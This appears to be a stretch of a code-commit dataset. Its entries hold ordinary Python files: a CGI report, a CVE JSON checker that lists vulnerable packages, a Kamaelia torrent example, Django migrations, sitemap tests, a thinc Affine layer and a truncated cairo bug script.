print '%2s %1s %-4s %20s %20s' % ('.', '.', '.', '.', '.')
if (row[0] == lastrow[0] and row[1] == lastrow[1] and
row[2] == lastrow[2] and
(row[3] == lastrow[3] or row[4] == lastrow[4])):
pass
else:
print '%2s %1s %-4s %20s %20s' % (row[0], row[1], row[2], row[3], row[4])
lastrow = row
def main():
"""Main()"""
form = cgi.FieldStorage()
wfo = form.getfirst("wfo", "MPX")
year = int(form.getfirst("year", 2015))
sys.stdout.write("Content-type: text/plain\n\n")
report(wfo, year)
if __name__ == '__main__':
main()
|
|
d31e468de531b4d9ccb1eba871d0d9b458f6dc4f
|
CheckVulnerableEntries.py
|
CheckVulnerableEntries.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
Add a tool to list pending issues
|
Add a tool to list pending issues
|
Python
|
mpl-2.0
|
rgacogne/ArchCVEToJSON
|
Add a tool to list pending issues
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
<commit_before><commit_msg>Add a tool to list pending issues<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
Add a tool to list pending issues#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
<commit_before><commit_msg>Add a tool to list pending issues<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import json
import os
import sys
def checkVulnerableEntries(dbFile):
if not os.path.isfile(dbFile):
sys.exit("JSON database %s does not exist!" % (dbFile))
with open(dbFile) as db:
issuesJSON = json.load(db)
for issue in issuesJSON:
if issue['status'] == 'Vulnerable':
print("Package %s %s is vulnerable since %s" % (issue['packages'][0], issue['vulnerableVersion'], issue['disclosureDate']))
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit('Usage: %s <JSON database>' % (sys.argv[0]))
checkVulnerableEntries(sys.argv[1])
|
|
853caeba0d11b7ecf10ad74e19cd8b3cd3c82084
|
Sketches/RJL/Torrent/Examples/example2.py
|
Sketches/RJL/Torrent/Examples/example2.py
|
from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
Test and example for new btkam.py TorrentClient.
|
Test and example for new btkam.py TorrentClient.
|
Python
|
apache-2.0
|
sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia,sparkslabs/kamaelia
|
Test and example for new btkam.py TorrentClient.
|
from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
<commit_before><commit_msg>Test and example for new btkam.py TorrentClient.<commit_after>
|
from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
Test and example for new btkam.py TorrentClient.from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
<commit_before><commit_msg>Test and example for new btkam.py TorrentClient.<commit_after>from Kamaelia.Util.PipelineComponent import pipeline
from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
import sys ; sys.path.append("/home/ryan/kamaelia/Sketches/RJL/")
from TriggeredFileReader import TriggeredFileReader
from DataSource import DataSource
from HTTPClient import HTTPClient
from btkam import TorrentClient, BasicTorrentExplainer
if __name__ == '__main__':
# download a linux distro
pipeline(
DataSource( ["http://www.legaltorrents.com/bit/trusted-computing.torrent",
"http://www.legaltorrents.com/bit/freeculture.zip.torrent"] ),
HTTPClient(),
TorrentClient(),
BasicTorrentExplainer(),
ConsoleEchoer(),
).run()
|
|
5f7bc24308bd9e3098612813ba4d5da0cd532cb6
|
python/testdata/counter.py
|
python/testdata/counter.py
|
from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
Add a very simple test program for distributed Python.
|
Add a very simple test program for distributed Python.
|
Python
|
apache-2.0
|
snyderek/floating_temple,snyderek/floating_temple,snyderek/floating_temple
|
Add a very simple test program for distributed Python.
|
from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
<commit_before><commit_msg>Add a very simple test program for distributed Python.<commit_after>
|
from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
Add a very simple test program for distributed Python.from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
<commit_before><commit_msg>Add a very simple test program for distributed Python.<commit_after>from peer import begin_tran, end_tran, shared
begin_tran()
num = shared.setdefault('num', 0) + 1
end_tran()
print('My unique number is', num)
|
|
d9c1b22ede009c4d75827232dd32fbf31f96ca67
|
chnnlsdmo/chnnlsdmo/migrations/0002_vote_created.py
|
chnnlsdmo/chnnlsdmo/migrations/0002_vote_created.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
Add migration to provide Vote timestamp column
|
Add migration to provide Vote timestamp column
|
Python
|
bsd-3-clause
|
shearichard/django-channels-demo,shearichard/django-channels-demo,shearichard/django-channels-demo
|
Add migration to provide Vote timestamp column
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
<commit_before><commit_msg>Add migration to provide Vote timestamp column<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
Add migration to provide Vote timestamp column# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
<commit_before><commit_msg>Add migration to provide Vote timestamp column<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-08 02:43
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('chnnlsdmo', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vote',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 4, 8, 2, 43, 38, 823308, tzinfo=utc)),
preserve_default=False,
),
]
|
|
14d19d4d515ad5d181cc7e0bebd3929b22b82972
|
backend/breach/migrations/0018_target_samplesize.py
|
backend/breach/migrations/0018_target_samplesize.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
Add migration for Target samplesize
|
Add migration for Target samplesize
|
Python
|
mit
|
dimkarakostas/rupture,dimriou/rupture,esarafianou/rupture,dionyziz/rupture,dionyziz/rupture,dimkarakostas/rupture,dionyziz/rupture,dimkarakostas/rupture,dionyziz/rupture,dimriou/rupture,dimkarakostas/rupture,dionyziz/rupture,dimriou/rupture,esarafianou/rupture,dimriou/rupture,dimkarakostas/rupture,dimriou/rupture,esarafianou/rupture,esarafianou/rupture
|
Add migration for Target samplesize
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
<commit_before><commit_msg>Add migration for Target samplesize<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
Add migration for Target samplesize# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
<commit_before><commit_msg>Add migration for Target samplesize<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-06-06 14:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('breach', '0017_auto_20160530_1450'),
]
operations = [
migrations.AddField(
model_name='target',
name='samplesize',
field=models.IntegerField(default=64, help_text='The amount of samples per sampleset.'),
),
]
|
|
a803b54a588e5e96b7c1fd4877117dabd0facdf9
|
mediacloud/mediawords/util/sitemap/test_helpers.py
|
mediacloud/mediawords/util/sitemap/test_helpers.py
|
import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
assert html_unescape_ignore_none("test & test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
Add some tests for sitemap parsing helpers
|
Add some tests for sitemap parsing helpers
|
Python
|
agpl-3.0
|
berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud
|
Add some tests for sitemap parsing helpers
|
import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
assert html_unescape_ignore_none("test & test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
<commit_before><commit_msg>Add some tests for sitemap parsing helpers<commit_after>
|
import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
assert html_unescape_ignore_none("test & test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
Add some tests for sitemap parsing helpersimport datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
assert html_unescape_ignore_none("test & test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
<commit_before><commit_msg>Add some tests for sitemap parsing helpers<commit_after>import datetime
from mediawords.util.sitemap.helpers import html_unescape_ignore_none, parse_sitemap_publication_date
def test_html_unescape_ignore_none():
assert html_unescape_ignore_none("test & test") == "test & test"
assert html_unescape_ignore_none(None) is None
def test_parse_sitemap_publication_date():
assert parse_sitemap_publication_date("1997-07-16") == datetime.datetime(year=1997, month=7, day=16)
assert parse_sitemap_publication_date("1997-07-16T19:20+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
assert parse_sitemap_publication_date("1997-07-16T19:20:30.45+01:00") == datetime.datetime(
year=1997, month=7, day=16, hour=19, minute=20, second=30, microsecond=450000,
tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)),
)
|
|
cfb17cb9f7c72908b5bc915d8f0e2e465358c45f
|
thinc/neural/affine.py
|
thinc/neural/affine.py
|
from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
Move Affine to its own module
|
Move Affine to its own module
|
Python
|
mit
|
spacy-io/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc
|
Move Affine to its own module
|
from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
<commit_before><commit_msg>Move Affine to its own module<commit_after>
|
from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
Move Affine to its own modulefrom .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
<commit_before><commit_msg>Move Affine to its own module<commit_after>from .base import Model
from .exceptions import ShapeError
class Affine(Model):
name = 'affine'
@property
def describe_params(self):
yield 'W-%s' % self.name, (self.nr_out, self.nr_in), self.ops.xavier_uniform_init
yield 'b-%s' % self.name, (self.nr_out,), None
@property
def shape(self):
if self.output_shape is None or self.input_shape is None:
return None
else:
return (self.nr_out, self.nr_in)
@property
def output_shape(self):
return (self.nr_out,) if self.nr_out is not None else None
@output_shape.setter
def output_shape(self, value):
self.nr_out = value[0]
@property
def input_shape(self):
return (self.nr_in,) if self.nr_in is not None else None
@input_shape.setter
def input_shape(self, value):
self.nr_in = value[0]
@property
def W(self):
return self.params.get('W-%s' % self.name)
@property
def b(self):
return self.params.get('b-%s' % self.name)
@property
def d_W(self):
return self.params.get('d_W-%s' % self.name)
@property
def d_b(self):
return self.params.get('d_b-%s' % self.name)
def __init__(self, nr_out=None, nr_in=None, *args, **kwargs):
# This sets attributes from kwargs.
# args is passed for potential subclasses.
self.nr_out = nr_out
self.nr_in = nr_in
Model.__init__(self, *args, **kwargs)
def predict_batch(self, input_BI):
return self.ops.affine(self.W, self.b, input_BI)
def begin_update(self, input_BI, dropout=0.0):
self.check_input(input_BI)
output_BO = self.predict_batch(input_BI)
if dropout != 0.0:
output_BO, bp_dropout = self.ops.dropout(output_BO, dropout)
return output_BO, bp_dropout(self._get_finish_update(input_BI))
else:
return output_BO, self._get_finish_update(input_BI)
def _get_finish_update(self, acts_BI):
def finish_update(d_acts_BO, optimizer=None, **kwargs):
d_b = self.d_b
d_W = self.d_W
d_b += d_acts_BO.sum(axis=0)
d_W += self.ops.batch_outer(d_acts_BO, acts_BI)
if optimizer is not None:
optimizer(self.params.weights, self.params.gradient,
key=('', self.name), **kwargs)
return self.ops.batch_dot(d_acts_BO, self.W.T)
return finish_update
|
|
2311673478616bf16b4411772511e301e82b9860
|
misc/cairo-group-pdf-bug.py
|
misc/cairo-group-pdf-bug.py
|
import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
